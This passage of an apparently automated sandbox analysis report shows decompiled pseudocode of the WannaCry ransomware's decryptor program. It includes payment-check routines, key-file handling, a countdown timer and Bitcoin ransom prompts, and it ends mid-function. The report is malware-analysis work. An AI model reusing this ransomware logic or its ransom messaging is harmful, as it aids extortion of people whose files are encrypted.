                                                      					_t277 =  *((intOrPtr*)(_t281 + 0x54));
                                                      					if(_t277 == 0) {
                                                      						_t165 =  &_v180;
                                                      						if(_v148 == 0) {
                                                      							_t165 =  &_v164;
                                                      						}
                                                      						 *((intOrPtr*)( *_t281 + 0xc0))( &_v216, _t165,  &_v180);
                                                      					} else {
                                                      						_t177 = E00409D40( &_v52,  &_v216,  &_v180);
                                                      						if(_t277 != 0) {
                                                      							FillRect(_v264, _t177,  *(_t277 + 4));
                                                      						} else {
                                                      							FillRect(_v264, _t177, 0);
                                                      						}
                                                      					}
                                                      					 *((intOrPtr*)( *_t281 + 0xc8))( &_v228,  &_v176,  &(_v196.top));
                                                      					_v292 = 0x4166e0;
                                                      					_v52 = 7;
                                                      					if(_v244 == 0) {
                                                      						_v284 = 0;
                                                      						_v288 = 0;
                                                      						_v52 = 6;
                                                      					} else {
                                                      						_t172 = _v256;
                                                      						E00409F80(_v264, _v260, _v256, _v252 - _v260, _v248 - _v256,  &_v292, _v260, _t172, 0xcc0020);
                                                      						_t112 =  &_v324; // 0x4166e0
                                                      						E00409F10(_t112, _v300);
                                                      						_v88 = 6;
                                                      					}
                                                      				}
                                                      				_t133 =  &_v252; // 0x41675c
                                                      				_t152 = E00409E20(_t133);
                                                      				_v28 = 0;
                                                      				L00412E3C();
                                                      				_v28 = 0xffffffff;
                                                      				L00412DB8();
                                                      				 *[fs:0x0] = _v36;
                                                      				return _t152;
                                                      			}


                                                      APIs
                                                      • #470.MFC42 ref: 00408708
                                                      • GetClientRect.USER32(?,?), ref: 0040871F
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
                                                      • #6734.MFC42(?,?), ref: 00408746
                                                      • #323.MFC42(?,?), ref: 0040874F
                                                      • CreateCompatibleDC.GDI32(?), ref: 004087D2
                                                      • #1640.MFC42(00000000), ref: 004087DD
                                                        • Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
                                                        • Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E
                                                        • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D
                                                      • #6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
                                                      • FillRect.USER32(?,?,?), ref: 0040887D
                                                      • #2754.MFC42(?,?), ref: 00408892
                                                      • #2381.MFC42(?,?,?), ref: 0040889F
                                                      • #3797.MFC42(?,?,?), ref: 004088C0
                                                      • _ftol.MSVCRT ref: 00408951
                                                      • _ftol.MSVCRT ref: 0040896F
                                                      • FillRect.USER32(?,00000000,00000000), ref: 004089B0
                                                      • #640.MFC42(?,?,?), ref: 00408B09
                                                      • #755.MFC42(?,?,?), ref: 00408B20
                                                        • Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3
                                                        • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Rect$#5785CompatibleCreateFill_ftol$#1640#1641#2381#2754#323#3797#470#6194#640#6734#755BitmapClientMessageSend
                                                      • String ID: \gA$fA$fA
                                                      • API String ID: 1027735583-2217880857
                                                      • Opcode ID: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
                                                      • Instruction ID: b72dd9534e9f1d52b621f8c4883ea919de29669ae4f9aefa89eb3b477b52946b
                                                      • Opcode Fuzzy Hash: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
                                                      • Instruction Fuzzy Hash: 33D12CB16083419FC314DF25C984AAFBBE9BBC8304F508E2EF1D993291DB749949CB56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wcsicmp$_wcsnicmpwcsstr
                                                      • String ID: This folder protects against ransomware. Modifying it will reduce protection$Content.IE5$N(@$Temporary Internet Files$\AppData\Local\Temp$\Intel$\Local Settings\Temp$\Program Files$\Program Files (x86)$\ProgramData$\WINDOWS
                                                      • API String ID: 2817753184-2613825984
                                                      • Opcode ID: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                                      • Instruction ID: 690a6d88e0cbcba8c0a0bc490ea4abea364cf6131422823267360e98b5ddcfca
                                                      • Opcode Fuzzy Hash: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                                      • Instruction Fuzzy Hash: 3831843235162023D520691D7D4AFCB638C8FE5727F554033FD44E52C1E29EB96A82BD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 61%
                                                      			E00401760(void* __ecx) {
                                                      				int _v8;
                                                      				intOrPtr _v12;
                                                      				char _v20;
                                                      				struct _IO_FILE* _v32;
                                                      				void _v2059;
                                                      				void _v2060;
                                                      				void _v2571;
                                                      				void _v2572;
                                                      				char _v2576;
                                                      				char _v2604;
                                                      				void* _v2608;
                                                      				char _v2616;
                                                      				void* _v2636;
                                                      				void* _v2640;
                                                      				void* _t36;
                                                      				struct _IO_FILE* _t37;
                                                      				signed int _t38;
                                                      				unsigned int _t45;
                                                      				signed int _t49;
                                                      				void* _t50;
                                                      				signed int _t67;
                                                      				struct _IO_FILE* _t87;
                                                      				void* _t94;
                                                      				void* _t97;
                                                      				intOrPtr _t98;
                                                      				void* _t99;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004134C6);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t98;
                                                      				_t99 = _t98 - 0xa28;
                                                      				_t94 = __ecx;
                                                      				L00412CD4();
                                                      				_t36 =  *(__ecx + 0xac);
                                                      				if(_t36 != 0) {
                                                      					WaitForSingleObject(_t36, 0xbb8);
                                                      					TerminateThread( *(_t94 + 0xac), 0);
                                                      					CloseHandle( *(_t94 + 0xac));
                                                      				}
                                                      				_t37 = E0040C670();
                                                      				if( *((intOrPtr*)(_t94 + 0xb4)) != 0) {
                                                      					L15:
                                                      					 *[fs:0x0] = _v12;
                                                      					return _t37;
                                                      				} else {
                                                      					_t37 =  *(_t94 + 0xa8);
                                                      					if(_t37 != 1) {
                                                      						if(_t37 != 0xffffffff) {
                                                      							if(_t37 != 2) {
                                                      								goto L15;
                                                      							}
                                                      							_push(0);
                                                      							_push(0x40);
                                                      							_push("Congratulations! Your payment has been checked!\nStart decrypting now!");
                                                      							L14:
                                                      							L00412CC8();
                                                      							goto L15;
                                                      						}
                                                      						if( *((intOrPtr*)(_t94 + 0xa0)) == 0) {
                                                      							L11:
                                                      							_push(0);
                                                      							_push(0xf0);
                                                      							_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
                                                      							goto L14;
                                                      						}
                                                      						_t38 = rand();
                                                      						asm("cdq");
                                                      						_t37 = _t38 / 3;
                                                      						if(_t38 % 3 != 0) {
                                                      							goto L11;
                                                      						}
                                                      						_push(0);
                                                      						_push(0x30);
                                                      						_push("Failed to check your payment!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
                                                      						goto L14;
                                                      					}
                                                      					_v2572 = 0;
                                                      					memset( &_v2571, 0, 0x7f << 2);
                                                      					asm("stosw");
                                                      					asm("stosb");
                                                      					_v2060 = 0;
                                                      					memset( &_v2059, 0, 0x1ff << 2);
                                                      					asm("stosw");
                                                      					asm("stosb");
                                                      					sprintf( &_v2604, "%08X.dky", 0);
                                                      					_t37 = fopen( &_v2604, "rb");
                                                      					_t87 = _t37;
                                                      					_t99 = _t99 + 0x2c;
                                                      					if(_t87 == 0) {
                                                      						_push(0);
                                                      						_push(0xf0);
                                                      						_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
                                                      						L00412CC8();
                                                      						 *(_t94 + 0xa8) = 0xffffffff;
                                                      					} else {
                                                      						_t45 = fread( &_v2060, 1, 0x800, _t87);
                                                      						fclose(_t87);
                                                      						DeleteFileA( &_v2604);
                                                      						_t97 =  &_v2060;
                                                      						_t67 = _t45 >> 2;
                                                      						_t49 = memcpy( &_v2572, _t97, _t67 << 2);
                                                      						_push("You have a new message:\n");
                                                      						_t50 = memcpy(_t97 + _t67 + _t67, _t97, _t49 & 0x00000003);
                                                      						_t99 = _t99 + 0x2c;
                                                      						L00412CAA();
                                                      						_push( &_v2576);
                                                      						_push(_t50);
                                                      						_push( &_v2616);
                                                      						_v8 = 0;
                                                      						L00412CCE();
                                                      						_t37 =  *_t50;
                                                      						_push(0);
                                                      						_push(0x40);
                                                      						_push(_t37);
                                                      						_v20 = 1;
                                                      						L00412CC8();
                                                      						_v32 = 0;
                                                      						L00412CC2();
                                                      						_v32 = 0xffffffff;
                                                      						L00412CC2();
                                                      					}
                                                      					goto L15;
                                                      				}
                                                      			}

                                                      0x00401863
                                                      0x00401870
                                                      0x00401873
                                                      0x00401877
                                                      0x0040187f
                                                      0x0040187f
                                                      0x00401885
                                                      0x00401892
                                                      0x00401893
                                                      0x00401894
                                                      0x00401895
                                                      0x0040189c
                                                      0x004018a1
                                                      0x004018a3
                                                      0x004018a4
                                                      0x004018a6
                                                      0x004018a7
                                                      0x004018af
                                                      0x004018b8
                                                      0x004018bf
                                                      0x004018c8
                                                      0x004018d3
                                                      0x004018d3
                                                      0x00000000
                                                      0x0040182e

                                                      APIs
                                                      • #6453.MFC42 ref: 00401780
                                                      • WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
                                                      • TerminateThread.KERNEL32(?,00000000), ref: 004017A5
                                                      • CloseHandle.KERNEL32(?), ref: 004017B2
                                                      • sprintf.MSVCRT ref: 00401811
                                                      • fopen.MSVCRT ref: 00401821
                                                      • fread.MSVCRT ref: 00401844
                                                      • fclose.MSVCRT ref: 0040184D
                                                      • DeleteFileA.KERNEL32(?), ref: 0040185B
                                                      • #537.MFC42(You have a new message:), ref: 00401885
                                                      • #924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
                                                      • #1200.MFC42 ref: 004018AF
                                                      • #800.MFC42 ref: 004018BF
                                                      • #800.MFC42 ref: 004018D3
                                                      • #1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5
                                                      Strings
                                                      • Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
                                                      • %08X.dky, xrefs: 0040180A
                                                      • Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
                                                      • You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
                                                      • You have a new message:, xrefs: 00401877
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1200#800$#537#6453#924CloseDeleteFileHandleObjectSingleTerminateThreadWaitfclosefopenfreadsprintf
                                                      • String ID: %08X.dky$Congratulations! Your payment has been checked!Start decrypting now!$Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.$You have a new message:
                                                      • API String ID: 2207195628-1375496427
                                                      • Opcode ID: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                                      • Instruction ID: 8b94a0d45af64711c1f2f56a46f7a966efbefe6460f93d7d0814001cf74dce0a
                                                      • Opcode Fuzzy Hash: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                                      • Instruction Fuzzy Hash: 1D41F371244740EFC330DB64C895BEB7699AB85710F404A3EF25AA32E0DABC5944CB6B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 53%
                                                      			E004012E0(void* __ecx) {
                                                      				int _v4;
                                                      				intOrPtr _v12;
                                                      				void _v2059;
                                                      				void _v2060;
                                                      				void _v2192;
                                                      				void _v2196;
                                                      				intOrPtr _v2324;
                                                      				void _v2328;
                                                      				void _v2332;
                                                      				char _v2364;
                                                      				char _v2396;
                                                      				char _v2436;
                                                      				char _v2468;
                                                      				char _v2508;
                                                      				char _v2540;
                                                      				intOrPtr _t61;
                                                      				long _t65;
                                                      				struct _IO_FILE* _t83;
                                                      				int _t85;
                                                      				intOrPtr _t88;
                                                      				struct _IO_FILE* _t91;
                                                      				int _t97;
                                                      				void* _t100;
                                                      				char* _t123;
                                                      				void _t131;
                                                      				struct _IO_FILE* _t143;
                                                      				struct _IO_FILE* _t146;
                                                      				struct _IO_FILE* _t149;
                                                      				void* _t154;
                                                      				signed int _t156;
                                                      				signed int _t157;
                                                      				intOrPtr _t161;
                                                      				void* _t164;
                                                      				void* _t166;
                                                      				void* _t169;
                                                      				void* _t172;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004134A6);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t161;
                                                      				_t61 =  *0x42189c; // 0x0
                                                      				_push(_t156);
                                                      				_t154 = __ecx;
                                                      				_t3 = _t61 + 0x50c; // 0x50c
                                                      				_t100 = _t3;
                                                      				sprintf( &_v2468, "%08X.pky",  *((intOrPtr*)(__ecx + 0xa4)));
                                                      				sprintf( &_v2540, "%08X.dky",  *((intOrPtr*)(_t154 + 0xa4)));
                                                      				_t164 = _t161 - 0x9e0 + 0x18;
                                                      				_t65 = GetFileAttributesA( &_v2540);
                                                      				_t157 = _t156 | 0xffffffff;
                                                      				if(_t65 == _t157) {
                                                      					L4:
                                                      					_v2196 = 0;
                                                      					memset( &_v2192, 0, 0x21 << 2);
                                                      					_t143 = fopen("00000000.res", "rb");
                                                      					_t166 = _t164 + 0x14;
                                                      					__eflags = _t143;
                                                      					if(_t143 != 0) {
                                                      						fread( &_v2196, 0x88, 1, _t143);
                                                      						fclose(_t143);
                                                      						_v2332 = 0;
                                                      						memset( &_v2328, 0, 0x21 << 2);
                                                      						sprintf( &_v2364, "%08X.res",  *((intOrPtr*)(_t154 + 0xa4)));
                                                      						_t146 = fopen( &_v2364, "rb");
                                                      						_t169 = _t166 + 0x34;
                                                      						__eflags = _t146;
                                                      						if(_t146 != 0) {
                                                      							fread( &_v2332, 0x88, 1, _t146);
                                                      							fclose(_t146);
                                                      							_t131 =  *0x421798; // 0x0
                                                      							_v2060 = _t131;
                                                      							memset( &_v2059, 0, 0x1ff << 2);
                                                      							asm("stosw");
                                                      							asm("stosb");
                                                      							sprintf( &_v2396, "%08X.eky",  *((intOrPtr*)(_t154 + 0xa4)));
                                                      							_t83 = fopen( &_v2396, "rb");
                                                      							_t149 = _t83;
                                                      							_t172 = _t169 + 0x34;
                                                      							__eflags = _t149;
                                                      							if(_t149 != 0) {
                                                      								_t85 = fread( &_v2060, 1, 0x800, _t149);
                                                      								fclose(_t149);
                                                      								_t39 = _t100 + 0x242; // 0x74e
                                                      								_t40 = _t100 + 0x1de; // 0x6ea
                                                      								E0040BE90("s.wnry", _t40, _t39);
                                                      								_t88 =  *0x42189c; // 0x0
                                                      								_push( *((intOrPtr*)(_t154 + 0x20)));
                                                      								_push( &_v2540);
                                                      								_push( *((intOrPtr*)(_t88 + 0x818)));
                                                      								_push( *((intOrPtr*)(_t88 + 0x81c)));
                                                      								_t46 = _t100 + 0xb2; // 0x5be
                                                      								_push(_t85);
                                                      								_push( &_v2060);
                                                      								_push(_v2324);
                                                      								_push( &_v2332);
                                                      								_push( &_v2196);
                                                      								_push(_t100 + 0xe4);
                                                      								_t91 = E0040C240( &_v2332, __eflags);
                                                      								_t172 = _t172 + 0x4c;
                                                      								_t83 = E0040C670();
                                                      								__eflags = _t91;
                                                      								if(_t91 >= 0) {
                                                      									E00404640( &_v2436);
                                                      									_v4 = 1;
                                                      									_t94 = E004047C0( &_v2436,  &_v2468,  &_v2540);
                                                      									__eflags = _t94;
                                                      									if(_t94 == 0) {
                                                      										 *(_t154 + 0xa8) = 1;
                                                      									} else {
                                                      										 *(_t154 + 0xa8) = 2;
                                                      									}
                                                      									_v4 = 0xffffffff;
                                                      									_t123 =  &_v2436;
                                                      									goto L15;
                                                      								}
                                                      							} else {
                                                      								 *(_t154 + 0xa8) = 0xffffffff;
                                                      							}
                                                      						} else {
                                                      							 *(_t154 + 0xa8) = 0xffffffff;
                                                      						}
                                                      					} else {
                                                      						 *(_t154 + 0xa8) = _t157;
                                                      					}
                                                      				} else {
                                                      					E00404640( &_v2508);
                                                      					_v4 = 0;
                                                      					if(E004047C0( &_v2508,  &_v2468,  &_v2540) == 0) {
                                                      						_t97 = DeleteFileA( &_v2540);
                                                      						_v4 = _t157;
                                                      						E00404690(_t97,  &_v2508);
                                                      						goto L4;
                                                      					} else {
                                                      						 *(_t154 + 0xa8) = 2;
                                                      						_v4 = _t157;
                                                      						_t123 =  &_v2508;
                                                      						L15:
                                                      						_t83 = E00404690(_t94, _t123);
                                                      					}
                                                      				}
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t83;
                                                      			}


                                                      APIs
                                                      • sprintf.MSVCRT ref: 00401323
                                                      • sprintf.MSVCRT ref: 00401339
                                                      • GetFileAttributesA.KERNEL32(?), ref: 00401343
                                                      • DeleteFileA.KERNEL32(?), ref: 0040139A
                                                      • fread.MSVCRT ref: 00401405
                                                      • fclose.MSVCRT ref: 00401408
                                                      • sprintf.MSVCRT ref: 00401440
                                                      • fopen.MSVCRT ref: 00401453
                                                        • Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A
                                                      • fopen.MSVCRT ref: 004013D5
                                                        • Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658
                                                        • Part of subcall function 004047C0: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
                                                        • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$CriticalDeleteFileSectionfopen$AttributesCryptEncryptInitialize_local_unwind2fclosefread
                                                      • String ID: %08X.dky$%08X.eky$%08X.pky$%08X.res$00000000.res$s.wnry
                                                      • API String ID: 2787528210-4016014174
                                                      • Opcode ID: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                                      • Instruction ID: 5d668cda142e4e69bdcb8de65b1bf6b3866dc1aa9a0cfc7ced8feefa58b75360
                                                      • Opcode Fuzzy Hash: 57a51ecc688d2c0761643bc18b0e2b9a7bca0d11f95f7de6ced9b52eb20b7f63
                                                      • Instruction Fuzzy Hash: 8A71BFB1104741AFD320DB60CC85FEBB3E9ABC4310F404A3EE59A87290EB78A4498B56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 63%
                                                      			E004076A0(void* __ecx) {
                                                      				intOrPtr _t89;
                                                      				char _t90;
                                                      				intOrPtr _t91;
                                                      				signed int _t94;
                                                      				intOrPtr _t98;
                                                      				signed int _t99;
                                                      				intOrPtr _t125;
                                                      				signed int _t133;
                                                      				void* _t136;
                                                      				intOrPtr _t139;
                                                      				signed int _t143;
                                                      				signed int _t147;
                                                      				void* _t148;
                                                      				intOrPtr _t161;
                                                      				signed int _t192;
                                                      				intOrPtr _t193;
                                                      				signed int _t196;
                                                      				signed int _t197;
                                                      				signed int _t198;
                                                      				intOrPtr _t200;
                                                      				intOrPtr _t202;
                                                      				void* _t204;
                                                      				intOrPtr _t206;
                                                      				void* _t207;
                                                      				void* _t208;
                                                      				void* _t209;
                                                      				void* _t210;
                                                      				void* _t211;
                                                      				void* _t213;
                                                      				long long _t225;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413EBB);
                                                      				_t89 =  *[fs:0x0];
                                                      				_push(_t89);
                                                      				 *[fs:0x0] = _t206;
                                                      				_t207 = _t206 - 0x8c;
                                                      				_t196 = 0;
                                                      				_t136 = __ecx;
                                                      				 *((intOrPtr*)(_t207 + 0x14)) = 0;
                                                      				 *((intOrPtr*)(_t207 + 0x18)) = 0;
                                                      				 *(_t207 + 0x1c) = 0;
                                                      				 *(_t207 + 0x20) = 0;
                                                      				_t204 = 0;
                                                      				L2:
                                                      				__imp__time(_t196);
                                                      				_t139 = M00421120; // 0x30303b30
                                                      				_t161 = _t89;
                                                      				_t90 = "00;00;00;00"; // 0x303b3030
                                                      				 *((intOrPtr*)(_t207 + 0x40)) = _t139;
                                                      				 *(_t207 + 0x3c) = _t90;
                                                      				_t91 =  *0x421124; // 0x30303b
                                                      				 *((intOrPtr*)(_t207 + 0x44)) = _t91;
                                                      				_t208 = _t207 + 4;
                                                      				 *(_t208 + 0x24) = _t196;
                                                      				memset(_t208 + 0x44, 0, 0x16 << 2);
                                                      				_t209 = _t208 + 0xc;
                                                      				if(_t204 != 0) {
                                                      					_t94 =  *(_t136 + 0x580);
                                                      				} else {
                                                      					_t94 =  *(_t136 + 0x57c);
                                                      				}
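                                                      				_t98 =  *((intOrPtr*)(_t136 + 0x578));
                                                      				// The shift-and-add chain below computes _t94 * 86400 (3 * 5 * 5 * 9 * 128), i.e. _t94 scaled by the number of seconds in a day.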
                                                      				_t143 = _t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4) * 8 << 7;
                                                      				if(_t161 <= _t98) {
                                                      					_t99 =  *(_t209 + 0x24);
                                                      				} else {
                                                      					_t133 = _t98 - _t161 + _t143;
                                                      					_t196 = _t133;
                                                      					if(_t196 <= 0) {
                                                      						_t99 =  *(_t209 + 0x24);
                                                      					} else {
                                                      						asm("cdq");
                                                      						_t99 = _t133 * 0x64 / _t143;
                                                      					}
                                                      					if(_t196 < 0) {
                                                      						_t196 = 0;
                                                      					}
                                                      				}
                                                      				if(_t204 != 0) {
                                                      					 *(_t209 + 0x20) = _t99;
                                                      				} else {
                                                      					 *(_t209 + 0x14) = _t196;
                                                      					 *(_t209 + 0x1c) = _t99;
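                                                      				}
                                                      				// The multiply-and-shift constants below are compiler-generated divisions by 86400 (0xc22e4507), 3600 (0x91a2b3c5) and 60 (0x88888889); they split the remaining seconds in _t196 into the four "%02d;%02d;%02d;%02d" fields.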
                                                      				 *(_t209 + 0x2e) = ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10) + ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10 >> 0x1f);
                                                      				_t147 =  *(_t209 + 0x2e) & 0x0000ffff;
                                                      				_t197 = _t196 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4) * 8 << 7);
                                                      				 *(_t209 + 0x30) = ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb) + ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb >> 0x1f);
                                                      				_t192 =  *(_t209 + 0x30) & 0x0000ffff;
                                                      				_t198 = _t197 + _t192 * 0xfffff1f0;
                                                      				 *(_t209 + 0x32) = ((0x88888889 * _t198 >> 0x20) + _t198 >> 5) + ((0x88888889 * _t198 >> 0x20) + _t198 >> 5 >> 0x1f);
                                                      				sprintf(_t209 + 0x48, "%02d;%02d;%02d;%02d", _t147, _t192,  *(_t209 + 0x32) & 0x0000ffff, _t198 +  ~((( *(_t209 + 0x32) & 0x0000ffff) << 4) - ( *(_t209 + 0x32) & 0x0000ffff)) * 4);
                                                      				_t207 = _t209 + 0x18;
                                                      				if(_t204 != 0) {
                                                      					_t148 = _t136 + 0x444;
                                                      					_push(_t207 + 0x38);
                                                      				} else {
                                                      					_push(_t207 + 0x38);
                                                      					_t148 = _t136 + 0x3c8;
                                                      				}
                                                      				_t89 = E00405180(_t148);
                                                      				_t204 = _t204 + 1;
                                                      				if(_t204 < 2) {
                                                      					_t196 = 0;
                                                      					goto L2;
                                                      				}
                                                      				SendMessageA( *(_t136 + 0x140), 0x402,  *(_t207 + 0x1c), 0);
                                                      				SendMessageA( *(_t136 + 0x1c4), 0x402,  *(_t207 + 0x20), 0);
                                                      				L00412DA6();
                                                      				 *(_t207 + 0xa4) = 0;
                                                      				_t225 =  *((intOrPtr*)(_t136 + 0x584));
                                                      				if( *((intOrPtr*)(_t207 + 0x14)) <= 0) {
                                                      					_t225 = _t225 + st0;
                                                      					 *(_t136 + 0x818) = 1;
                                                      				}
                                                      				_t124 =  *((intOrPtr*)(_t136 + 0x588));
                                                      				if(_t124 != 0) {
                                                      					 *((long long*)(_t207 + 0x14)) = _t225;
                                                      					_t200 =  *((intOrPtr*)(_t207 + 0x18));
                                                      					_t193 =  *((intOrPtr*)(_t207 + 0x14));
                                                      					_push(_t200);
                                                      					_push(_t193);
                                                      					_t124 = _t136 + 0x81c;
                                                      					_push("%.1f BTC");
                                                      					_push(_t136 + 0x81c);
                                                      					L00412E00();
                                                      					_t210 = _t207 + 0x10;
                                                      					_push(_t200);
                                                      					_push(_t193);
                                                      					_push("Send %.1f BTC to this address:");
                                                      					_push(_t210 + 0x10);
                                                      					L00412E00();
                                                      					_t211 = _t210 + 0x10;
                                                      				} else {
                                                      					L0041304A();
                                                      					_t202 = _t124;
                                                      					_push(_t202);
                                                      					_push("$%d");
                                                      					_push(_t136 + 0x81c);
                                                      					L00412E00();
                                                      					_t213 = _t207 + 0xc;
                                                      					_push(_t202);
                                                      					_push("Send $%d worth of bitcoin to this address:");
                                                      					_push(_t213 + 0x10);
                                                      					L00412E00();
                                                      					_t211 = _t213 + 0xc;
                                                      				}
                                                      				_push( *((intOrPtr*)(_t211 + 0x10)));
                                                      				_push(0x402);
                                                      				L00412CE6();
                                                      				L00412CE0();
                                                      				_t125 =  *((intOrPtr*)(_t136 + 0x824));
                                                      				 *((intOrPtr*)(_t136 + 0x824)) = 0x121284;
                                                      				if(_t125 != 0x121284) {
                                                      					E004079C0(_t136);
